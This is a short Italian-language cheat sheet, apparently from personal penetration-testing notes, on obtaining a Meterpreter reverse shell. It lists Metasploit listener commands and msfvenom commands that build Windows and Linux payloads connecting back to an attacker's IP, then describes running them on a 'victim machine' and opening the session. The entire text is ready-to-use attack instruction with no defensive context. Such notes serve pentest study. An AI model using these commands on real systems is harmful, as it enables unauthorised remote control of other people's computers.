tags: reverse_shell metasploit Metasploit_Meterpreter meterpreter
Per ottenere una reverse shell meterpreter possiamo eseguire i seguenti passaggi:
Per prima cosa ci mettiamo in ascolto tramite un listener:
msfconsole
use /exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST tuo_ip
set LPORT 4444
exploit
Ora che abbiamo generato il listener possiamo generare il payload:
Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=tuo_ip LPORT=4444 -f exe -o payload.exeLinux
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=<TUO_IP> LPORT=<TUA_PORTA> -f elf -o reverse_shell.elfDopo aver trasferito questo payload sulla macchina vittima ed eseguito otterremo una reverse shell meterpreter.
Nel caso la connessione non si attivi automaticamente possiamo utlizzare i seguenti comandi per aprirla:
sessions -l
session -i <numero>